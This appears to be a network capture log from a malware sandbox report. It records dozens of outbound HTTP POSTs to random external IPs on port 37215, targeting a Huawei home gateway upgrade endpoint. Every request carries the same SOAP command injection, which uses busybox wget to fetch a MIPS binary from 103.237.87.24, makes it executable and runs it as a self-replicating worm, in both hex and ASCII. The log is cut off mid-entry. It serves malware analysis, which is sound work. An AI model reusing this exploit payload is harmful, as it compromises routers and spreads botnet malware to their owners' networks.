                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2257192.168.2.1350684197.141.55.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.602678061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2258192.168.2.1351140197.228.60.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.602732897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2259192.168.2.134806241.70.131.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.602781057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2260192.168.2.1360132197.101.9.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.602828026 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2261192.168.2.134339641.253.38.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.603689909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2262192.168.2.1353112172.148.135.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.603693008 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2263192.168.2.1358454157.117.202.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.603809118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2264192.168.2.135165241.123.168.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.603816032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2265192.168.2.1341292157.195.244.8537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.603828907 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2266192.168.2.1350812197.215.215.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.604585886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 